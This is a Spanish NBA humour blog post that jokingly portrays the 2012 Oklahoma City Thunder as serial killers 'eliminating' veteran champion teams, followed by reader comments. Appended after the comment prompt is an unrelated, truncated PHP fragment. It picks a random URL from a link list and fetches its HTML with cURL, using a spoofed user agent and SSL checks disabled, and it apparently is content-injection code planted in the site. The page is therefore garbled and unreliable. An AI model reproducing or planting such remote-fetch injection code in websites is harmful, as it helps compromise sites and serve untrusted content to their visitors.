Capítulo 1: Asesinos en serie

08 de June de 2012 por Sancho88

Estimados compañeros:

Esta carta en forma de noticia llegó a mi buzón la pasada mañana. Tengo a bien compartirla con ustedes. Les recomiendo precaución pues el contenido de la misma puede ser peligroso para sus vidas (sobre todo si el orgullo verde palpita en sus corazones). El contenido era el siguiente:

“Una banda de asesinos en serie anda suelta por la ciudad. Al parecer, según la descripción de los testigos, se trataría de un grupo de varones negros muy jóvenes y de alta estatura. Uno de ellos porta una barba profunda y se hace llamar ‘The black barba’, aunque no es su nombre real. Otros dos lucen sendas sonrisas en su rostro y parece ser que te matan mientras de miran a los ojo. Habría incluso dos sujetos más que han sido descritos como los más altos y corpulentos de la banda: el más joven de ellos presenta largos brazos y rasgos africanos, es posible que hable castellano, asesina de manera silenciosa y es especialmente efectivo en sus acciones; el otro es el más furioso, violento y peligroso de todos. Por su semblante es fácilmente reconocible, y ha sido descrito con rasgos antipáticos y oronda figura; a pesar de no llevar pistola, su brutalidad en los crímenes cometidos no tiene límites. De hecho, según los testigos de esta larga cadena de asesinatos, su lista de expulsiones en su puesto de trabajo es innumerable, y raro es el día que logra finalizar sin complicaciones su jornada laboral.

Si se cruzan con ellos, traten de esconderse en un refugio seguro y, sobre todo, mantengan la calma. Ya hay un número de teléfono facilitado por la policía de Oklahoma City al cual se pueden dirigir si reconocen a alguno de estos sujetos: 600350913. Reiteramos tomen precauciones pues se trata de 6 delincuentes muy peligrosos. El jefe de la banda podría tratarse de un hombre mayor y de aspecto añejo, con varios anillos a la espalda, que según los testigos podría tener rasgos cavernícolas. No se dejen seducir por su capacidad de persuasión. Al parecer, utiliza su oratoria y su retórica como arma dialéctica para cobrarse la vida de sus víctimas.

Según la policía de Oklahoma, la lista de asesinatos de esta banda de asaltadores y criminales no para de crecer. Además, siempre siguen un patrón común: señores viejos de más de 30 años de edad con al menos un anillo de campeón de la NBA en sus dedos. Las primeras víctimas fueron halladas en la ciudad texana de Dallas. En la mañana del 6 de mayo, una señora mayor, de unos 70 años, que no quiso revelar su identidad, informó a las autoridades de la desaparición de Jason Kidd, Dirk Nowitzki y Jason Terry. Supuestamente, hallaron sus restos baloncestísticos atados en el poste de la bandera del pabellón American Airlines Center. La muerte se debió a envenenamiento inmediato con cicuta. Según los forenses no sufrieron apenas. Fue una muerte de las llamadas dulces.

Más tarde, la policía federal registró nuevos asesinatos en la Costa Oeste de los Estados Unidos, concretamente en la ciudad de Los Angeles, California. En la madrugada del 21 al 22 de mayo, apenas 15 días después de su primera y salvaje matanza, otros tres cuerpos, esta vez con síntomas de haber opuesto algo de resistencia, aparecieron en los vestuarios del Staples Center. Los familiares han podido identificarlos, y podrían tratarse de los cuerpos sin vida de Kobe Bryant, Pau Gasol y Ron Artest, el cual portaba un nombre extraño en su camiseta, algo así como ‘Metta World Peace’. No hubo piedad ni siquiera con un hombre pacifista por concepción. En su cuerpo encontraron violentas señas de brutalidad y un estigma grabado a fuego con las iniciales J.H., además de una barba tatuada con su propia sangre. Según la policía, el hombre conocido como ‘The Black Barba’ pudo ser el causante de tan macabro detalle.

No obstante, la tragedia no cesa, y precisamente en la noche de ayer, otros tres cadáveres, de nuevo de más de 30 años, aparecieron en la ciudad texana de San Antonio. Un empleado de la limpieza del estadio AT&T Center que volvía a su casa después de trabajar, notó tres bultos voluminosos en su carro de trabajo envueltos en bolsas de basura. Cuando trató de averiguar qué había dentro, la sorpresa fue mayúscula, ya que se trataba de otros tres cadáveres. Todo hace indicar que una vez más, la banda de asesinos en serie de Oklahoma City ha vuelto a actuar. Las víctimas también eran un grupo de tres personas y uno de ellos portaba hasta cuatro anillos en las manos. Podría tratarse del afamado jugador de baloncesto Tim Duncan y de dos de sus compañeros: Manu Ginobili y Tony Parker. Esta vez, los forenses dictaminaron el caso como un ‘ajuste de cuentas’ después de humillación y escarnio público en el propio cubículo de San Antonio.

Según expertos en criminología, como el afamado Doctor Cabrera, las coincidencias en cuanto a edad, anillos de campeón de la NBA y extremada violencia en las muertes serían indicios suficientes de un cuidadoso y preparado ritual de exterminio que siempre termina con los cadáveres profanados y sin algún dedo de la mano. Este extraño proceder, en el cual los asesinos se llevan uno o varios ‘trofeos’ de sus víctimas seccionando alguna de sus falanges de la mano, denota una actitud ciertamente fetichista de estos sujetos en pos de un objetivo determinado: el anillo de campeones de la NBA.

En las últimas horas se han recibido llamadas anónimas desde la ciudad de Boston de ciudadanos que creen haberlos visto pasar por delante de sus casas. Por eso, desde hace escasos minutos, el cuerpo federal al completo de la ciudad de Boston custodia las casas de varios de sus habitantes. Ellos también cumplen el patrón exacto para ser asesinados: son mayores de 30 años y tienen un anillo de campeón de la NBA. Tres de los posibles objetivos de la banda serían Paul Pierce, Kevin Garnett y Ray Allen. Podrían tener sus días contados si se cruzan en su camino.

Repetimos, extremen las precauciones, y si es preciso, intenten resguardarse en sus casas de esta peligrosa banda de asesinos. Ustedes podrían ser los siguientes.”

Comenta

12 comentarios a esta entrada

  1. Heineken dice:
    #1

    Menudo crack eres Sancho88! jajaja tremendo!

      Citar

  2. simon dice:
    #2

    Buen articulo Sancho pero un consejo en mi humilde opinión! no pienses demasiado tus articulos tu magia sale de la espontaniedad y si los piensas pierden chispa aun asi muy bueno pero se nota que este te lo has pensao mucho mas jejejejejej.
    Enhorabuena esperamos mas articulos pronto!

      Citar

  3. Sancho88 dice:
    #3

    jeje, muchas gracias tíos!! me encanta que os haya gustado, eh, y en realidad no me llevó mucho tiempo, se ve que he visto demasiados capítulos de crímenes imperfectos, xd. na hombre, es que en realidad es muy curioso quienes han sido las víctimas de los Thunder, lo cual demuestra tb que el Oeste se está quedando viejuno viejuno. A ver qué pasa, si finalmente aparece la banda por Miami o por Boston, jeje. El número de teléfono tiene truco, a ver si alguien lo descubre…// Por cierto, estad atentos a la noche del draft que ese día la voy a preparar, algo tengo pensado sobre eso para el capítulo 2, la amenaza fantasma, jejeje. En realidad, esto hay que estar atentos que a mí se me va mucho y lo mismo adelanto los capítulos.

    Pd: se trata de picar a Magic para que haga un.. ejem… todos sabemos el qué….

    Pd2: y el título final de la sección, ‘Cada Sancho con su tema’ invita tb un poco a eso, a la espontaneidad de los espontáneos. Si alguno siente que tiene en su interior un pequeño trozo de Sancho, jajaja, siempre por supuesto en términos totalmente asépticos, morales, ascéticos y ortodoxos, y lo quiere sacar y enseñárselo al mundo, ya sabe lo que tiene que hacer. Este es el capítulo 1, con poner capítulo 2: lalaala, y explayarse, yo creo que mientras tenga que ver con la NBA, sea original y tal…. puede ser interesante. Eso sí, siempre y cuando lo permita la curia, necesitamos su beneplácito porque si dejaran el blog en mis manos esto no sé en qué se podría convertir, jajajaja. Saludos a todos!!

      Citar

  4. Jose Luis dice:
    #4

    El número de movil:

    0 Westbrook
    35 Durant
    09 Ibaka
    13 Harden

    Me falta el 60, y no sé quién es el señor viejo con anillos blabla. Sólo me encaja popovich xD

    Otra cosa es que el 6 sea porque describes 6 personajes y Westbrook sea el 00… al igual que a Ibaka le has puesto (según mi “asanchada” suposición jajajaja) un 0 delante del 9

      Citar

  5. Sancho88 dice:
    #5

    jejej, jop, el capo, il capo, il cavaliere, il duce, es el puto DEREK FORIIIIIIIIIIIIIIIIIIL!! Ah no, que esto es de la peli Blow, jajjaa. Me refiero a Fisher cabronazos. Quién si no es el cerebro de esta organización, más que el señor Oceans Fisher?

      Citar

  6. Sancho88 dice:
    #6

    y sí Jl, premio para el caballero. Acertaste lo del móvil, y el 6 del principio símplemente está ahí porque aparece en todos los móviles, estaría bien petar ese número imaginario y descubrir que está en manos de Galindo, por ejemplo, aquel señor que aparecía en Crónicas Marcianas. Esto en mi pueblo se arreglaba fácil. Cuando nos aburríamos, íbamos a las cabinas telefónicas, metíamos 5 duros cada uno y nos inventábamos teléfonos. El fenómeno troll existía antes de internet, y puedo dar fé

      Citar

  7. Rulax dice:
    #7

    llevo desde enero atento a este blog, leyendo todas las crónicas, cualquiera de vuestros comentarios…etc.. prácticamente no se casi nada de baloncesto, pero desde que os sigo me habéis enganchado totalmente a este mundo, desde entonces no dejo de ver estadísticas, vídeos y todo lo que pueda estar relacionado, y por supuesto no me he perdido ningún partido de estos magníficos playoffs que estamos viviendo. Con estos artículos conseguís que mis expectativas estén por las nubes. Espero que poco a poco pueda entrar en debate y entender este maravilloso mundo que es el baloncesto y sobretodo la NBA. Un abrazo a todos, seguid asi y espero que dentro de poco conteis con otro contendiente con el que debatir profundamente, cosa que me encanta jajaja Añadir que por lo que he visto este año hay dos equipos que por encima de todos me han hecho vibrar con este deporte, y son OKC y San Antonio. En regular season vi un OKC-Timberwolves con, si no me equivoco, 3 prorrogas, que me dejo anonadado y con el segundo partido de finales de conferencia oeste entre OKC-SAS poco mas y llego al orgasmo 😛 jajaja

      Citar

  8. Lost dice:
    #8

    Más de 30 años y con anillo…. LeBron sueña con eliminar a los Celtics

      Citar

  9. MagicJohnson32 dice:
    #9

    Estás fatal, Sancho. Pero mal, mal, mal. Para encerrar, vamos.

    Espero que esto solo sea el primero de muchos por venir.

    Ah, no hace falta que me piques, tengo unas ‘Reflexiones’ en la cocina. En cuanto acaben las finales, las acabo y las saco.

      Citar

  10. TheDeerHunter dice:
    #10

    MagicJohnson32:

    Ah, no hace falta que me piques, tengo unas ‘Reflexiones’ en la cocina. En cuanto acaben las finales, las acabo y las saco.

    Eso se lo dices a todas

      Citar

  11. MagicJohnson32 dice:
    #11

    TheDeerHunter: Eso se lo dices a todas

    Sí, pero al oído y susurrando, solo a ti.

      Citar

  12. Sancho88 dice:
    #12

    preparad las palomitas que aquí hay folleteo fijo, xD

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>